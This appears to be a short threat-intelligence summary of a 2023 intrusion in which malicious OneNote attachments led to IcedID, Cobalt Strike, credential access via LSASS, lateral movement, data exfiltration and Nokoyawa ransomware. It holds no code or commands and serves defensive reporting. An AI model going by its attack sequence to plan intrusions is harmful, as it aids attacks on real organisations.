Microsoft OneNote Files Used To Drop Nokoyawa Ransomware
In early 2023 an intrusion occurred through a phishing campaign distributing emails with malicious OneNote attachments. Opening these triggered execution of a cmd file launching PowerShell to download an IcedID DLL disguised as image files. A scheduled task ensured persistence. After 21 days of limited activity IcedID malware was discovered using Microsoft tools. On day 33 Cobalt Strike beacons were launched initiating Active Directory discovery and AnyDesk installation. The threat actor accessed LSASS for reconnaissance utilized various tools including Task Manager and SoftPerfect Network Scanner and began lateral movement. They executed ransomware on critical servers exfiltrated data and covered their tracks. The attack lasted 812 hours over 34 days.